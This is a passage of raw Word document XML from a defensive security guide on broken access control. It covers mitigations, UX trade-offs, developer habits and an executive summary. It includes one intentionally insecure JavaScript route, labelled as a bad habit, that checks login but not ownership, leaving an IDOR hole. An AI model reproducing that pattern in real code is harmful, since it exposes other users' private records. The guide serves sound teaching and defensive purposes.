      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure ownership checks are handled natively at the database query level using JOIN operations rather than checking individual records post-fetch in the application memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E5A45" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cryptographic Decoupling:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use signed stateless tokens (like JWTs) to pass permissions securely between microservices, allowing individual services to verify the signature locally via public/private keys without making synchronous network calls back to a central auth server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A9C635"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2. User Experience (UX) Friction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A25C17C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Over-engineered security can frustrate users. If an access control system is too aggressive, users might experience sudden session timeouts, lose their place in multi-step workflows because an expiring token forces a hard redirect, or face confusing "Access Denied" screens without any context or pathway to request permission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257C90E8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Balance Strategy:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Graceful Degradation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Design the frontend user interface to dynamically read permissions. If a user lacks access to a specific action (e.g., "Delete User"), the button should be cleanly grayed out or hidden, preventing them from attempting a forbidden action in the first place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CFEC79" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Silent Token Refresh:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use a dual-token architecture (short-lived access tokens combined with secure, HTTP-only refresh tokens) to silently renew user sessions in the background without interrupting their active workflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AFAFC7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Developer Education</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF74C9F"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Understanding the psychological mistakes and habits of development teams is key to stopping the cycle of re-introducing access control flaws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494335BF"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The #1 Misconception: "Authentication Equals Authorization"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3271ACE4"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 xml:space="preserve">The single most destructive habit in application development is confusing </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>who a user is</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>what a user is allowed to do</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E026BC3"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lastRenderedPageBreak/>
        <w:t>Developers frequently write code assuming that because a route sits behind a "login wall" (Authentication), it is inherently safe. They create an authentication middleware that verifies a user has a valid session cookie, apply it to the whole router, and think their job is done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DECF5E0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A16AA5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">// THE BAD HABIT: Assumes authentication is enough </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>router.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>('/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">/invoice/:id', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>checkIsLoggedIn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">, (req, res) =&gt; { // Dangerous! Any logged-in user can guess an :id and view it. const invoice = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>db.getInvoice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">(req.params.id); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>res.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>(invoice); });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4984EE5E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Why This Bad Habit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Persists</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0BB96F5B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Happy-Path Testing Bias:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> When developers test their own code, they log in as User A, look at User A's data, and see that it works beautifully. They rarely think like an attacker to log in as User B and intentionally try to fetch User A's data identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F1BC6A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Isolation of Features:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Code is often reviewed and deployed feature-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>byfeature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>. A developer focusing entirely on building a sleek invoice viewing feature focuses on performance and UI layout, treating authorization as an infrastructure problem that "someone else" or a global firewall will catch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD61DDA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>The Educational Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70440AE2"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Teams must be trained to treat access control as an explicit, two-step validation paradigm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D62865F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Step 1 (Authentication):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Who are you?</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., User 501).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C9D788" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Step 2 (Authorization):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Do you own or have explicit permission to access Object X?</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Does User 501 own Invoice 992?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255E6156"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Unless both steps are explicitly satisfied on the server, the transaction must fail by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C8ED6B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>The Summary (Executive Brief)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2748FF29"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Style w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Vulnerability Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> OWASP A01:2025 – Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367180D7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Risk Level: Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Ranked #1 on the OWASP Top 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6893BE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Primary Root Cause:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application relies on unverified, client-side data parameters or lacks explicit server-side checks to ensure the authenticated user has permission to interact with the requested object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F8BF7C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Quick Detection Method:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A "three-token test" using an interception proxy (like Burp Suite) to replay a privileged API request with standard-user and unauthenticated guest session tokens to see if the server processes the data anyway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D6BB42" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Ultimate Prevention:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement a strict </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>"Deny by Default"</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> routing architecture combined with centralized backend framework guards that programmatically enforce record-level ownership checks directly inside data queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DAAA32" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Key Business Danger:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Massive public exposure of customer PII (Personally Identifiable Information) or sensitive financial data, resulting in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C00420" w14:textId="5B9C45C8" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
